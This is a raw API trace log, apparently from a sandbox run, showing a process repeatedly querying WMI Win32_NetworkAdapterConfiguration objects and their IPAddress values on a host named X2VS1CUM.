	[0068.764] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0068.765] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199c8f0 | out: puCount=0x350199c8f0*=0x2) returned 0x0
	[0068.765] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8f0*=0x0, pszText=0x0 | out: puBuffLength=0x350199c8f0*=0x17, pszText=0x0) returned 0x0
	[0068.765] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8f0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199c8f0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.765] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199c8f0 | out: puCount=0x350199c8f0*=0x2) returned 0x0
	[0068.765] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8f0*=0x0, pszText=0x0 | out: puBuffLength=0x350199c8f0*=0x17, pszText=0x0) returned 0x0
	[0068.765] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8f0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199c8f0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.765] IWbemClassObject:GetNames (in: This=0x233e12e5480, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x350199c8e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x350199c8e0 | out: pNames=0x350199c8e0*="\x01ƀ\x08") returned 0x0
	[0068.765] SafeArrayGetDim (psa=0x233fc6847e0) returned 0x1
	[0068.765] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__GENUS", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x350199c8dc*=3, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.765] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__CLASS", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.765] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0068.766] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__SUPERCLASS", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.766] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0068.766] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__DYNASTY", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.766] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0068.766] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__RELPATH", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration.Index=1", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.766] SysStringLen (param_1="Win32_NetworkAdapterConfiguration.Index=1") returned 0x29
	[0068.766] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3d, varVal2=0x0), pType=0x350199c8dc*=3, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.767] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__DERIVATION", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233fc6841e0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233fc644d10, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x350199c8dc*=8200, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.767] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__SERVER", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="X2VS1CUM", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.767] SysStringLen (param_1="X2VS1CUM") returned 0x8
	[0068.767] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__NAMESPACE", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.767] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0068.767] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__PATH", lFlags=0, pVal=0x350199c8e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c8dc*=0, plFlavor=0x350199c8d8*=0 | out: pVal=0x350199c8e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1", varVal2=0x0), pType=0x350199c8dc*=8, plFlavor=0x350199c8d8*=64) returned 0x0
	[0068.767] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1") returned 0x3f
	[0068.767] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199c980 | out: puCount=0x350199c980*=0x2) returned 0x0
	[0068.767] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c980*=0x0, pszText=0x0 | out: puBuffLength=0x350199c980*=0x17, pszText=0x0) returned 0x0
	[0068.767] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c980*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199c980*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.767] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="IPADDREss", lFlags=0, pVal=0x350199c970*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c96c*=0, plFlavor=0x350199c968*=0 | out: pVal=0x350199c970*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233fc684160*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233fc7040c0, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0x350199c96c*=8200, plFlavor=0x350199c968*=0) returned 0x0
	[0068.768] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="IPADDREss", lFlags=0, pVal=0x350199cba0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199cb9c*=8200, plFlavor=0x350199cb98*=0 | out: pVal=0x350199cba0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233fc684320*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233fc7040c0, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0x350199cb9c*=8200, plFlavor=0x350199cb98*=0) returned 0x0
	[0068.770] CoTaskMemAlloc (cb=0x104) returned 0x233fc7092b0
	[0068.770] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233fc7092b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0068.770] CoTaskMemFree (pv=0x233fc7092b0) 
	[0068.796] CoTaskMemAlloc (cb=0x104) returned 0x233fc707d70
	[0068.796] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233fc707d70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0068.796] CoTaskMemFree (pv=0x233fc707d70) 
	[0068.797] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199c8a0 | out: puCount=0x350199c8a0*=0x2) returned 0x0
	[0068.797] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8a0*=0x0, pszText=0x0 | out: puBuffLength=0x350199c8a0*=0x17, pszText=0x0) returned 0x0
	[0068.797] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199c8a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.797] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199c8a0 | out: puCount=0x350199c8a0*=0x2) returned 0x0
	[0068.797] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8a0*=0x0, pszText=0x0 | out: puBuffLength=0x350199c8a0*=0x17, pszText=0x0) returned 0x0
	[0068.797] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8a0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199c8a0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.797] IWbemClassObject:GetNames (in: This=0x233e12e5480, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x350199c898*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x350199c890 | out: pNames=0x350199c890*="\x01ƀ\x08") returned 0x0
	[0068.797] SafeArrayGetDim (psa=0x233fc6844a0) returned 0x1
	[0068.797] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__GENUS", lFlags=0, pVal=0x350199c890*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c88c*=0, plFlavor=0x350199c888*=0 | out: pVal=0x350199c890*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x350199c88c*=3, plFlavor=0x350199c888*=64) returned 0x0
	[0068.797] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__CLASS", lFlags=0, pVal=0x350199c890*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c88c*=0, plFlavor=0x350199c888*=0 | out: pVal=0x350199c890*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0x350199c88c*=8, plFlavor=0x350199c888*=64) returned 0x0
	[0068.797] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0068.798] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__SUPERCLASS", lFlags=0, pVal=0x350199c890*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c88c*=0, plFlavor=0x350199c888*=0 | out: pVal=0x350199c890*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0x350199c88c*=8, plFlavor=0x350199c888*=64) returned 0x0
	[0068.798] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0068.798] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__DYNASTY", lFlags=0, pVal=0x350199c890*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c88c*=0, plFlavor=0x350199c888*=0 | out: pVal=0x350199c890*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0x350199c88c*=8, plFlavor=0x350199c888*=64) returned 0x0
	[0068.798] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0068.798] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__RELPATH", lFlags=0, pVal=0x350199c890*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c88c*=0, plFlavor=0x350199c888*=0 | out: pVal=0x350199c890*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration.Index=1", varVal2=0x0), pType=0x350199c88c*=8, plFlavor=0x350199c888*=64) returned 0x0
	[0068.798] SysStringLen (param_1="Win32_NetworkAdapterConfiguration.Index=1") returned 0x29
	[0068.798] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x350199c890*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c88c*=0, plFlavor=0x350199c888*=0 | out: pVal=0x350199c890*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3d, varVal2=0x0), pType=0x350199c88c*=3, plFlavor=0x350199c888*=64) returned 0x0
	[0068.798] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__DERIVATION", lFlags=0, pVal=0x350199c890*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c88c*=0, plFlavor=0x350199c888*=0 | out: pVal=0x350199c890*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233fc6849e0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233fc6446e0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x350199c88c*=8200, plFlavor=0x350199c888*=64) returned 0x0
	[0068.799] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__SERVER", lFlags=0, pVal=0x350199c890*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c88c*=0, plFlavor=0x350199c888*=0 | out: pVal=0x350199c890*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="X2VS1CUM", varVal2=0x0), pType=0x350199c88c*=8, plFlavor=0x350199c888*=64) returned 0x0
	[0068.799] SysStringLen (param_1="X2VS1CUM") returned 0x8
	[0068.799] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__NAMESPACE", lFlags=0, pVal=0x350199c890*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c88c*=0, plFlavor=0x350199c888*=0 | out: pVal=0x350199c890*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x350199c88c*=8, plFlavor=0x350199c888*=64) returned 0x0
	[0068.799] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0068.799] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__PATH", lFlags=0, pVal=0x350199c890*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c88c*=0, plFlavor=0x350199c888*=0 | out: pVal=0x350199c890*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1", varVal2=0x0), pType=0x350199c88c*=8, plFlavor=0x350199c888*=64) returned 0x0
	[0068.799] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1") returned 0x3f
	[0068.799] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199c930 | out: puCount=0x350199c930*=0x2) returned 0x0
	[0068.799] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c930*=0x0, pszText=0x0 | out: puBuffLength=0x350199c930*=0x17, pszText=0x0) returned 0x0
	[0068.799] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c930*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199c930*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.799] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="IPADDRESs", lFlags=0, pVal=0x350199c920*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c91c*=0, plFlavor=0x350199c918*=0 | out: pVal=0x350199c920*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233fc684c60*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233fc703e00, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0x350199c91c*=8200, plFlavor=0x350199c918*=0) returned 0x0
	[0068.800] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199c8b0 | out: puCount=0x350199c8b0*=0x2) returned 0x0
	[0068.800] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8b0*=0x0, pszText=0x0 | out: puBuffLength=0x350199c8b0*=0x17, pszText=0x0) returned 0x0
	[0068.800] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8b0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199c8b0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.800] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199c8b0 | out: puCount=0x350199c8b0*=0x2) returned 0x0
	[0068.800] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8b0*=0x0, pszText=0x0 | out: puBuffLength=0x350199c8b0*=0x17, pszText=0x0) returned 0x0
	[0068.800] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c8b0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199c8b0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.800] IWbemClassObject:GetNames (in: This=0x233e12e5480, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x350199c8a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x350199c8a0 | out: pNames=0x350199c8a0*="\x01ƀ\x08") returned 0x0
	[0068.800] SafeArrayGetDim (psa=0x233fc684860) returned 0x1
	[0068.800] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__GENUS", lFlags=0, pVal=0x350199c8a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c89c*=0, plFlavor=0x350199c898*=0 | out: pVal=0x350199c8a0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x350199c89c*=3, plFlavor=0x350199c898*=64) returned 0x0
	[0068.800] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__CLASS", lFlags=0, pVal=0x350199c8a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c89c*=0, plFlavor=0x350199c898*=0 | out: pVal=0x350199c8a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0x350199c89c*=8, plFlavor=0x350199c898*=64) returned 0x0
	[0068.800] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0068.801] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__SUPERCLASS", lFlags=0, pVal=0x350199c8a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c89c*=0, plFlavor=0x350199c898*=0 | out: pVal=0x350199c8a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0x350199c89c*=8, plFlavor=0x350199c898*=64) returned 0x0
	[0068.801] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0068.801] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__DYNASTY", lFlags=0, pVal=0x350199c8a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c89c*=0, plFlavor=0x350199c898*=0 | out: pVal=0x350199c8a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0x350199c89c*=8, plFlavor=0x350199c898*=64) returned 0x0
	[0068.801] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0068.801] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__RELPATH", lFlags=0, pVal=0x350199c8a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c89c*=0, plFlavor=0x350199c898*=0 | out: pVal=0x350199c8a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration.Index=1", varVal2=0x0), pType=0x350199c89c*=8, plFlavor=0x350199c898*=64) returned 0x0
	[0068.801] SysStringLen (param_1="Win32_NetworkAdapterConfiguration.Index=1") returned 0x29
	[0068.801] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x350199c8a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c89c*=0, plFlavor=0x350199c898*=0 | out: pVal=0x350199c8a0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3d, varVal2=0x0), pType=0x350199c89c*=3, plFlavor=0x350199c898*=64) returned 0x0
	[0068.801] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__DERIVATION", lFlags=0, pVal=0x350199c8a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c89c*=0, plFlavor=0x350199c898*=0 | out: pVal=0x350199c8a0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233fc684a60*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233fc644670, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x350199c89c*=8200, plFlavor=0x350199c898*=64) returned 0x0
	[0068.802] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__SERVER", lFlags=0, pVal=0x350199c8a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c89c*=0, plFlavor=0x350199c898*=0 | out: pVal=0x350199c8a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="X2VS1CUM", varVal2=0x0), pType=0x350199c89c*=8, plFlavor=0x350199c898*=64) returned 0x0
	[0068.802] SysStringLen (param_1="X2VS1CUM") returned 0x8
	[0068.802] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__NAMESPACE", lFlags=0, pVal=0x350199c8a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c89c*=0, plFlavor=0x350199c898*=0 | out: pVal=0x350199c8a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x350199c89c*=8, plFlavor=0x350199c898*=64) returned 0x0
	[0068.802] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0068.802] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="__PATH", lFlags=0, pVal=0x350199c8a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c89c*=0, plFlavor=0x350199c898*=0 | out: pVal=0x350199c8a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1", varVal2=0x0), pType=0x350199c89c*=8, plFlavor=0x350199c898*=64) returned 0x0
	[0068.802] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1") returned 0x3f
	[0068.802] IWbemPath:GetNamespaceCount (in: This=0x233e3a02510, puCount=0x350199c940 | out: puCount=0x350199c940*=0x2) returned 0x0
	[0068.802] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c940*=0x0, pszText=0x0 | out: puBuffLength=0x350199c940*=0x17, pszText=0x0) returned 0x0
	[0068.802] IWbemPath:GetText (in: This=0x233e3a02510, lFlags=4, puBuffLength=0x350199c940*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x350199c940*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0068.802] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="IPADDRESs", lFlags=0, pVal=0x350199c930*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199c92c*=0, plFlavor=0x350199c928*=0 | out: pVal=0x350199c930*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233fc6846a0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233fc7040c0, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0x350199c92c*=8200, plFlavor=0x350199c928*=0) returned 0x0
	[0068.803] IWbemClassObject:Get (in: This=0x233e12e5480, wszName="IPADDRESs", lFlags=0, pVal=0x350199caf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350199caec*=8200, plFlavor=0x350199cae8*=0 | out: pVal=0x350199caf0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233fc684da0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233fc7041a0, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0x350199caec*=8200, plFlavor=0x350199cae8*=0) returned 0x0
	[0068.803] CoTaskMemAlloc (cb=0x8) returned 0x233fc644a20
	[0068.803] IEnumWbemClassObject:Next (in: This=0x233fc6f4ed0, lTimeout=-1, uCount=0x1, apObjects=0x233fc644a20, puReturned=0x350199d478 | out: apObjects=0x233fc644a20*=0x233e12e3190, puReturned=0x350199d478*=0x1) returned 0x0
	[0068.803] IUnknown:QueryInterface (in: This=0x233e12e3190, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x350199c7a0 | out: ppvObject=0x350199c7a0*=0x233e12e3190) returned 0x0
